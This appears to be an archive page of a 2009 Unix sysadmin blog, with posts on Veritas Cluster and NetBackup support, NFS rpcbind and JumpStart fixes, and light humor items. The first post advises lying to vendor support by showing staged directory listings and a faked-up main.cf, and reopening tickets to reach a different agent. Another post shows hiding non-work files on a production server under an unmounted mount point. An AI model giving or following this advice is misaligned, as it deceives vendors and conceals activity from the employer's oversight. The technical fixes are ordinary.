Basically, what this means is that Symantec has VCS Cluster support for NetBackup (They own both NetBackup and Veritas Cluster Server), have VCS modules (types files, pkg's, etc) for NetBackup and even have full documentation online to help you setup your NetBackup Server(s) in VCS. Even given that fact, they do not support NetBackup in a VCS cluster that also runs, say, NFS or Oracle or even a shared mountpoint that isn't NB-related. NOTE: They especially don't support IPmultiNIC_B (I'm not sure why, since NIC auto-failback seems like a great idea to me)!! Their contention is that NetBackup is meant to function on VCS as the "only service or resource." This is fine, if you can spare 2 or 3 servers to just run NetBackup (larger companies, and data security/storage/backup companies, probably have no issue with this). However, most businesses can't afford to spare the extra servers "just" for NetBackup and will often have NetBackup in the same VCS cluster that runs an NFS group/resource, other shared mountpoints, web servers, databases, etc. Hopefully not "all" of those on one machine, but times are tight; you never know ;)

Now, here's the trick (it's not even a trick, really, just some good advice to help you out) to getting speedy support from Symantec when you call them about an issue with NetBackup on VCS: You're going to have to do a little bit of prep work and (even if it hurts) lie a little bit. If you're not comfortable "bending the truth," just remember that dishonesty is the second-best policy. Things could be worse ;)

1. Before you call, have a backup main.cf ready to go. And, this is very important if you're working on a cluster that's been around for a while, make sure that you do one of two things when Symantec Support asks for anything like an "ls" of your /etc/VRTSvcs/conf/config directory:

a. Do a very specific ls:

host # ls /etc/VRTSvcs/conf/config/main.cf <-- They don't need to see the other 500 hundred backups that are three times the size of your faked-up file ;)

b. Create a staging directory, copy only the minimal files you want into it, and then give them an "ls" of that:

host # cd /etc/VRTSvcs/conf/config/stage <-- Don't show them this!
host # ls -l *

2. As noted above, you need a clean main.cf for NetBackup Support, or you're going to end up getting bounced around from department to department, at best. If you're running anything aside from NetBackup in one cluster, you'll need to remove it (not literally, of course). Here's a quick example (This setup is going to be very basic, just to keep it short - which means the commented dependency trees that VCS puts into the conf file are removed, for this example, as well) - BTW, feel free to use this exact main.cf (just change a few names and numbers) if it works for you. It's been verified on the system I'm goofing with, but it probably won't work out-of-the-box on your system :)

Since this example is so long, I'll bid you farewell for the day, now. Hope this helps you if you ever get in a "We don't support such-and-such" or "You really shouldn't be doing such-and-such" or "It's a VCS Problem <--> It's a NetBackup Problem" sort-of-situation. And, remember, even if you goof up once and tell them the truth (who amongst us isn't guilty of being upfront every once in a while ;), you can always ask them to cancel your request ("Oh wait, I see what the problem is... Sorry, you can close the ticket" etc) and then call back later and go through normal channels so you'll hopefully get a different person (and, when you do, be sure to intimate that the problem you're having now is totally unrelated to the previous ticket, if they're efficient and happen to look for, and find, it. It's worth a shot ;)

Cheers,

--- Stripped-Down main.cf ---

include "types.cf"
include "/usr/openv/netbackup/bin/cluster/vcs/NetBackupTypes.cf"

cluster VCScluster1 (
        UserNames = { admin = EncryptedPassword }
        ClusterAddress = "10.10.10.199"
        Administrators = { admin }
        )

system VCShost1 (
        )

system VCShost2 (
        )

group ClusterService (
        SystemList = { VCShost1 = 0, VCShost2 = 1 }
        AutoStartList = { VCShost1 }
        )

        IP webip (
                Device = bge0
                Address = "10.10.10.199"
                NetMask = "255.255.255.0"
        )

        NIC webnic (
                Device = bge0
        )

        webip requires webnic

group SG_VCSNB1 (
        SystemList = { VCShost1 = 0, VCShost2 = 1 }
        AutoStartList = { VCShost1 }
        )

        IPMultiNIC nbuIP (
                Address = "10.10.10.199"
                MultiNICResName = mnic
        )

        MultiNICA mnic (
                Device @VCShost1 = { bge1 = "10.10.10.197", bge2 = "10.10.10.198" }
                Device @VCShost2 = { bge2 = "10.10.10.198", bge1 = "10.10.10.197" }
                ArpDelay = 5
                IfconfigTwice = 1
                PingOptimize = 0
        )

        DiskGroup VCShostDG (
                DiskGroup = VCShostDG
                )

        Mount MNT_NBmount_VCSNB1 (
                MountPoint = "/opt/VRTSnbu"
                BlockDevice = "/dev/vx/dsk/VCShostDG/NBmount"
                FSType = vxfs
                MountOpt = largefiles
                FsckOpt = "-y"
                )

        NetBackup APP_nbu_VCSNB1 (
                Critical = 0
                ServerName = NBU_Server
                ServerType = NBUMaster
                )

        Volume VOL_NBmount_VCSNB1 (
                Volume = NBmount
                DiskGroup = VCShostDG
                )

        APP_nbu_VCSNB1 requires nbuIP
        APP_nbu_VCSNB1 requires MNT_NBmount_VCSNB1
        MNT_NBmount_VCSNB1 requires VOL_NBmount_VCSNB1
        VOL_NBmount_VCSNB1 requires VCShostDG
        nbuIP requires mnic


, Mike



Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!


Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Posted by Mike Golvach at 12:35 AM Edit Post Message

, , , , , , ,

Sunday, February 8, 2009

More Computer Comics To Round Out The Weekend

Happy Sunday,

Hope you're having a relaxing and (if simultaneously possible in this universe) exciting Sunday ;)

This Sunday's comic humor offering, comes from The Fifth Wave which, like most comics/cartoons is sometimes funny :) I'm not bashing it in any way, of course. Think of it this way: If your life is approximately 50% enjoyable, you're doing better than most. Ask any psychiatrist (or pharmaceutical rep ;)

Cheers,


Fifth Wave by Rich Tennant

Fw090201



, Mike



Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!


Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Posted by Mike Golvach at 12:03 AM Edit Post Message

, , , , , , ,

Saturday, February 7, 2009

Learning Linux Through Humor And Comics!

Happy Saturday :)

Today (or yesterday, or the day after tomorrow.. whenever this post was/will-be written ;) we stumbled upon this site that's shooting at teaching Linux to the younger generation by introducing Open Source to them through comics. I actually know a few guys who could benefit from this form of learning themselves. Not me, though. I only read "graphic novels" ;)

Today we're linking to their first issue (which you can find on their Issue Guide). It's downloadable, printable and free, so check it out if you get a chance.

Actually, below, is the list of issues they discuss in their "FIRST ISSUE." It's quite expansive. You can download the first issue in ebook form for free!

Is the below list of issues too much? Only you can decide. It's turned my brain into pudding and I have a lot of learning to do before I go back to doing this for a living in two days ;) Just kidding, of course :)

Cheers,


The first issue of 'Hackett and Bankwell' teaches readers how to switch from commercial operating systems to the Free and Open Source GNU/Linux platform. The issue focuses on the GUI (Graphical User Interface) and shows the audience how to search for and install software using the Synaptic Package Manager in Gnome. If some of the terminology in the comic was new and you want more information on any of the technical topics introduced in the first issue of Hackett and Bankwell, you can find it in the links below. Information covered in #1 includes:
A History of UNIX
A History of the GNU General Public License
A History of the GNU Project
A History of Linux from a GNU-centric perspective
A History of Linux from a Linux-centric perspective
A History of Cyber Criminals
A History of Debian Linux
A History of RedHat Linux
A History of Ubuntu Linux
A Linux Timeline
Open Source Alternatives to Commercial Apps
More Linux Alternatives to Commercial Software
Information on Linux as a Mobile Device Platform
Saving Money on Software Expenses with Linux
Linux or GNU Linux?
Understanding the Linux GUI
Information on the GNOME Graphical User Interface
List of GNU Packages
List of Linux Distributions (Distros)
List of Linux LiveCD Distros
Intro to Debian for RedHat Users
Differences between RedHat and Debian Linuxes
Package Management in Ubuntu
Package Management in RedHat
Information on GIMP
USA EPA Guide to Recycling Electronics
Find an E-Cycler
Editing Boot Options in the BIOS
Official Ubuntu Installation Documentation
Professional Video in Linux
Free Video Editing Software in Linux
Lifehacker's Top 10 Programs in Ubuntu
Setting up Evolution Email in Ubuntu
Upgrading an Existing Ubuntu Installation
Using the Ubuntu Update Manager
Understanding Binary Files
Understanding Source Code
Specifying Repositories in Ubuntu
Using the Synaptic Package Manager in Ubuntu
Open Office Productivity Software
VLC Media Player in Linux
Slashdot Article on Audio Editing with Linux
Information on the Linux Command Line Interface
List of UFO Crashes




, Mike



Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!


Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Posted by Mike Golvach at 12:44 AM Edit Post Message

, , , , , , ,

Friday, February 6, 2009

Happy Birthday To My Wife: Firefox Spotted In Outer Space

Hey there,

Today's post is dedicated to my wife, who shall remain ageless ;)

These photos are actually from about a year ago, when we were just starting this blog and the rest of my family ceased to exist for a little while :) You can check out the original post on blog.wired.com, but I've included the entire post here (minus the surrounding link-love logos) Her birthday was actually yesterday, if you put any stock in the date stamp on these posts ;)

Happy **th birthday, sweety :) (Her actual age has been removed to protect the innocent... who am I kidding. I'm guilty as Hell ;)


Firefox Logo Spied In Deep Space



By Charlie Sorrel EmailApril 11, 2008 | 6:43:02 AMCategories: Elsewhere in the Tubes  

hubble-fox-1.jpg


One of these is a photograph taken by the Hubble space telescope on December 17, 2002, featuring the variable star V838 Monocerotis. The other is the same photograph overlaid with a familiar logo. Can you tell which is which?



Below is another photo of the same star, from the Wikipedia entry on V838 Monocerotis. If the above photo has been photoshopped to look more like the Firefox logo, the editing seems minimal: it's been rotated relative to the photo below, and some of the gas cloud may have been edited out around the "tail" of the fox.



If you've got a link to the original Hubble photo used above, let us know in the comments so we can compare. UPDATE: An eagle-eyed commenter, Wevah, spotted the original version of the Firefox-like nova photo on Wikipedia. It looks like the only modification was to rotate the image. It must be a sign from the stars!



V838_monocerotis





Firefox logo spotted in deep space by the Hubble Telescope





, Mike



Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!


Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Posted by Mike Golvach at 12:30 AM Edit Post Message

, , , , , , ,

Thursday, February 5, 2009

A Little VCS NFS Gotcha On Solaris 10

Hey again,

We're going back to the Solaris 10 Unix well, reaching back a little (as opposed to the 14 month reach-back we did yesterday ;) and adding a little something to our posts on adding NFS management to an existing VCS cluster as well as the follow up on how to do the exact same thing without taking your VCS cluster offline. Today's post is actually another little bit of fix-it knowledge to keep in the back of your hat (if that's even an expression anyone's ever used... if not, consider it © ® ™ us ;). And, of course, this piece of knowledge came to everyone by accident. Actually, by virtue of an accident... the answer was found methodically... I think ;)

In any event, after extensively field-testing the methods espoused in the earlier posts referenced above, a deployment of clustered servers to an offsite location ended up having an issue that we weren't able to anticipate (or cause to occur in previous cookie-cutter-similar deployments). For some reason, when we rolled this cluster out, NFS just refused to work in a failover capacity. Actually, it only failed, specifically, to allow the main node to mount on the failover node. This problem seems pedestrian (even still ;) - the only odd thing was that it had never happened before under equal circumstances.

Here's what we figured out along the way (and how to fix it, too ;) For our purposes today (and the way it was then) the NFS cluster component works fine on node-b, but node-a can't mount the NFS resource when it fails over to node-b.

1. The first thing most people do in any investigation is to see if the basic stuff is all up and running. We don't like to be different, so we duly checked that all of the required VCS resources were up and online. They were; which explained the puzzling ONLINE state ;)

2. We then proceeded to ensure that, in fact, node-b was sharing out the NFS resource. Commands like showmount indicated that it, indeed, was. A little research into the subject showed that the issue we ended up having can indicate an RPC failure at this point, as well, but it's best to try step 3, too, just to be sure the problem isn't confined to a single server (although the fix for it is the same no matter which way your story goes ;)

3. Then we finally struck gold, and got an actual error, when we tried to hit the mount from node-a:

node-a # showmount -e node-b
 showmount: node-a: RPC: Rpcbind failure - RPC: Authentication error
node-a # rpcinfo -p node-b
 rpcinfo: can't contact portmapper: RPC: Authentication error; why = Failed (unspecified error)


4. Unspecified errors are the best kind of errors you can get since there are a much wider variety of possible solutions you can come up with... Or, maybe I have that backwards... There's really not much more to step 4. This step is a practice in surrealism ;)

5. It turns out that the answer lay in setting rpcbind properties (away from the defaults on both servers). The answer to the problem (or the fix, if you will) actually makes more sense than the way things "usually" work. The first thing we did was to set rpcbind to "global" on both nodes. By default, it was set to "local_only." We double confirmed that this is still the case on other cluster setups we have running, in which everything is hunky-dory. You also need to do these steps on both nodes (or all nodes) in your cluster, while, here, we're only showing what we typed on the active NFS resource-sharing node:

node-b # svcprop network/rpc/bind:default | grep local_only <-- See if the local_only property is set
config/local_only boolean true <-- and there it is!

then move on to fixing the problem (again on both nodes) by setting the rpcbind configuration value to global (which, in the instance of rpcbind, actually means setting the local_only attribute to "false"):

node=b # svccfg
svc:> select network/rpc/bind
svc:/network/rpc/bind> setprop config/local_only=false
svc:/network/rpc/bind> quit


6. Then, just double check to make sure you've gotten it all set up correctly:

node-b # svcprop network/rpc/bind:default | grep local_only
config/local_only boolean true

...well, that's not right, but don't give up just yet! Keep typing. Type, Forrest, Type! ;)

node-b # svcadm refresh network/rpc/bind:default
node-b # svcprop network/rpc/bind:default | grep local_only
config/local_only boolean false

there... that's better.

7. Finally, just make sure you can mount your NFS resource from whichever node isn't currently hosting the NFS resource. You don't necessarily have to test it on both nodes, once you've fixed this issue on both, but why risk the near-future embarrassment?

node-a # showmount -e node-b
export list for node-b:
/our/shared/directory (everyone)

And that's that. You should be good to go :) Since all's well that ends well, we'll try not to leave you with any clichés in our farewell. Parting is, after all, such sweet sorrow. At least until tomorrow :)

Cheers,

, Mike



Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!


Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Posted by Mike Golvach at 12:16 AM Edit Post Message

, , , , , , ,

Wednesday, February 4, 2009

The Linux/Unix SysAdmin Covert File Storage Method Number 57

Hey there,

Today's post is the 57th installment of a two or three part series of posts that refuses to play by the rules. Look for Volume 3 and Issue 437 in the near future ;)

This post's trick (actually it's more of a gimmick - or a way any one of us has probably screwed up at some point in time ;) is fairly simple and, as is generally the case, inversely proportionate in complexity to the work I'm currently gettting paid to do so my wife, kids and 5 animals don't go hungry. I'm somewhat obsessive-compulsive and tend to forget to eat more often than I remember to. Metabolism, of course, is just another one of life's cruel jokes. I'm not gigantic, but my waistline implies a lavish and sedentary lifestyle I don't enjoy. Actually, my fitness-oriented friends tell me that I'd lose the spare-tire if I just ate more regularly. While this makes perfect sense, I generally don't ;) ...and then, every once in a while, I digress...

This little goof is pretty simple to pull off (assuming you're a sysadmin and/or have the access, privilege and opportunity to do it) and can be a life-saver. Technically, you shouldn't ever need to do this, but sometimes convenience trumps sanity...

You may recall a post we did a long long time ago, in a galaxy just down the block, regarding finding space hogs on multiple overlay-mounted filesystems. This little way to hide bits of information works relatively along the same lines. The one serious limitation it has is that, while you'll be secretly storing your information, you won't be hiding the actual disk space it consumes, so this method of packing away all the stuff you're not supposed to have on the company's production web server has its limitations.

For today, we'll use a /usr/local mount point that we have on a Solaris machine (independent of the /usr mount point) to demonstrate.

Step 1: Take a lay of the land. In order for this to work, you need to have enough space to stow away what you need to and, hopefully, enough space to make your addition barely noticeable. Our setup isn't bad, especially since the "actual" filesystem that's going to be impacted will be the /usr filesystem underneath /usr/local (If it were /usr/local, the change might be noticed since the filesystem is so "empty")

host # ls /usr/local
PKG-Get     etc         lib         lost+found  pkgs        share
bin         info        libexec     man         sbin
host # df -k /usr/local
Filesystem            kbytes    used   avail capacity  Mounted on
/dev/dsk/c0t0d0s5    51650439  167184 50966751     1%    /usr/local
host # df -k /usr
Filesystem            kbytes    used   avail capacity  Mounted on
/dev/dsk/c0t0d0s3    5233086 3550979 1629777    69%    /usr


Step 2: Peel back the carpet. This is where you have to be quick, and is the essence of our little shell-game. First, we'll unmount the /usr/local filesystem, leaving us with this (df -k for /usr/local now shows that it's just a simple directory on /usr):

host # umount /usr/local
host # df -k /usr/local
Filesystem            kbytes    used   avail capacity  Mounted on
/dev/dsk/c0t0d0s3    5233086 3550979 1629777    69%    /usr
host # ls /usr/local


Under normal circumstances, this directory should now be empty (unless someone else is doing the same thing as you, or just forgot to clean up before they created the separate /usr/local overlay mount).

Step 3: Sweep your non-work-related-stuff under the rug, or into the /usr/local directory, as it were:

host # mv non-work-related-stuff /usr/local/
host # ls /usr/local
non-work-related-stuff


Step 4: Make sure things look normal. See if your addition makes a noticeable difference in your df output (It probably won't unless you're going to try and sack-away your mp3 collection ;)

host # df -k /usr
Filesystem            kbytes    used   avail capacity  Mounted on
/dev/dsk/c0t0d0s3    5233086 3550981 1629775    69%    /usr


Step 5: Pretend nothing happened. Once you're satisfied (which should be as soon as possible), remount /usr/local and verify that everything looks the same (excepting your modification of the /usr filesystem):

host # mount /usr/local
host # ls /usr/local
PKG-Get     etc         lib         lost+found  pkgs        share
bin         info        libexec     man         sbin
host # df -k /usr/local
Filesystem            kbytes    used   avail capacity  Mounted on
/dev/dsk/c0t0d0s5    51650439  167184 50966751     1%    /usr/local
host # df -k /usr
Filesystem            kbytes    used   avail capacity  Mounted on
/dev/dsk/c0t0d0s3    5233086 3550981 1629775    69%    /usr


And you're all set. You can get your stuff back eventually (even sooner if you don't care what people think ;)

Of course, that's an old trick, but one we've never covered here. As this blog gets larger, we're going to try and devote a little less time to being original. Of course, we mean that in a good way :) Since this is essentially a knowledge-dumping-ground, meant for users and admins of all skill levels, every post can't be about some crazy way to do something you'd have to be insane to want to do in the first place!

Come on in; the mediocrity's fine ;)

Cheers,

, Mike



Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!


Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Posted by Mike Golvach at 12:12 AM Edit Post Message

, , , , , , ,

Tuesday, February 3, 2009

JumpStart Symlinks And Solaris 10 Unix

Hey there,

Today's topic covers a little issue I ran into at work (which I actually do from time to time ;) that had me puzzled for a bit. If you're a grizzled Solaris/Slakware veteran like me, some of the newer features of Solaris 10 are pretty much lost on you until you absolutely "need" to understand them ;) Case in point, NFS sharing and JumpStart on Solaris 10 and/or ZFS (a point we seem to have overlooked in the onslaught of information in our post featuring Solaris' 5/08 Release Notes. Do a find for "NFS" - it's a realllllly long release note :)

The issue we had going on was that we'd gotten in the habit of running a JumpStart, and then sometime later (maybe days, weeks, who knows?) running another, etc; money's tight, not too many new machines to build and everything worked fine. Solaris 10 was doing great (That isn't to say that it didn't do great the entire time we had this problem ;) The issue was more of a fundamental misunderstanding and lack of knowledge on my part). Then, a few days ago, we had the time and the means, and I began a two-fisted JumpStart (Nothing violent, just concurrent installations ;)

Then, after I'd run through this a few more times than I'm proud to admit, I finally threw up my hands after yet another attempt at double-JumpStarting failed. The failure was very specific so I was fairly certain I was either doing something wrong or I was doing something wrong ;) Basically, both machines would boot up to the net and begin their JumpStart installations. All would go swimmingly; finding the JumpStart host, grabbing the correct profile, finish scripts and sysidcfg files. The bummer was that, after completing the full install of Solaris 10 (yes, it made us wait until after "all" of the software had been installed) it would get this funky error (hopefully, you've seen it before, and this post might just help you out :) :

Completed software installation

Solaris 10 software installation succeeded

Customizing system files
        - Mount points table (/etc/vfstab)
        - Unselected disk mount points (/var/sadm/system/data/vfstab.unselected)        - Network host addresses (/etc/hosts)

ERROR: Could not open file (/etc/hosts)

ERROR: Could not set up the remote host file (/etc/hosts)

ERROR: System installation failed
Solaris installation program exited.


????????????

Okay, so we were kind of stumped (well, totally stumped until we figured out the solution - by definition, I think ;) It turns out that one of our procedurals before initiating the "boot net - install" portion of single server JumpStarts was actually contributing to our confusion about what the problem really was. The reason for that is because we would always sync our local JumpStart server with the master. Good practice, but (in this case) a bit of a diversion. Anyway, we'll get to why that mattered in a bit ;)

Investigation into the matter (which, after several failed installs, consisted of crashing the install in the mini-root to check the state of the JumpStart temporary mount configuration in real-time) revealed something interesting. If you look up the page a little (or just remember ;) the killer error we got was:

ERROR: Could not open file (/etc/hosts)

ERROR: Could not set up the remote host file (/etc/hosts)

ERROR: System installation failed


Looking at the state of the filesystem, after crashing at the point of error, revealed this directory structure in the temporarily mounted /etc filesystem (stripped down a bit for brevity's sake):

...
-r--r--r-- 1 root sys 99 Feb 2 16:48 hosts
...
-r--r--r-- 1 root sys 91 Feb 2 16:48 ipnodes
...
-r--r--r-- 1 root sys 384 Feb 2 16:48 netmasks
...


The reason that's interesting is that those files should have looked like this:

...
lrwxrwxrwx 1 root other 29 Feb 2 16:56 hosts -> ../../tmp/root/etc/inet/hosts
...
lrwxrwxrwx 1 root other 31 Feb 2 16:56 ipnodes -> ../../tmp/root/etc/inet/ipnodes
...
lrwxrwxrwx 1 root other 32 Feb 2 16:56 netmasks -> ../../tmp/root/etc/inet/netmasks
...


Essentially, Solaris 10 was converting special symlinked files into straight-up flat-files during the JumpStart process. Once that was complete (and the files were corrupted) it really "couldn't" open them up, because the real /etc/hosts file was supposed to be in the /tmp/root/etc directory and not the local one (which is on JumpStart's read-only mini-root filesystem)!

It turns out that this problem (as far as we were interested in figuring out) seems to manifest itself in Solaris 10 for the most part. It may happen in Solaris 9, but we can't go back now!!! :)

And the root cause was... drum roll, please, as I build up to feeling really stupid ;)

The JumpStart mini-root directory was being served up via NFS "read/write"! Doh! And (I'm bringing this back from up top, just as I promised) our procedure for doing JumpStarts had actually made this harder to see. Since we only did one JumpStart at a time, the initial JumpStart would work (even though it left behind a corrupted filesystem). And, per our procedure, right before we kicked off the next one, we'd sync that filesystem up with the known-good master JumpStart server. At no point was this filesystem corruption ever noticed due to the fact that we never had to jump more than one box at a time. Crazy ;)

Anyway, long story short, the quick and simple fix was to unshare the mini-root (/JumpStart/Sol10 for instance, or whatever yours might be) and then reshare it as "read only." If you've been doing this all along (which you should be ;), you'll never have our problem ...probably ;)

Depending upon how your system is setup, you can share NFS a number of ways in Solaris 10. After I ran "unshareall," I was a bit puzzled as to why /etc/dfs/dfstab was empty (See what I meant before? ;). Since I'm such a dinosaur, I wrote it off, figuring somebody had run the share command at the command line and forgot to put that command in an init script or the dfstab file. On many occasions, I would have been correct (and Solaris 10 does still support this type of NFS sharing). The cool thing here is that our JumpStart mini-root was living on a Solaris 10 ZFS dataset. So, all that had to be done to correct the issue (after I uncorrected my incorrect correction ;) was to adjust a property of the dataset in Solaris 10 (actually a very cool feature, I think :) Since the ZFS datasets have a "sharenfs" attribute built-in (set to "no" by default), all we had to do was to change that. A very simple command line to type and a very simple solution to a seemingly complicated issue:

host # zfs set sharenfs=ro,anon=0 maindg/jumpstart/Sol10

Problem solved. And only 3 or 4 hours wasted (I mean, well spent ;) Hopefully this pitiful little tale of woe will get you out of a similar jam sometime :)

Cheers,

, Mike



Discover the Free Ebook that shows you how to make 100% commissions on ClickBank!


Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Posted by Mike Golvach at 12:52 AM Edit Post Message

, , , , , ,

Subscribe to: Posts (Atom)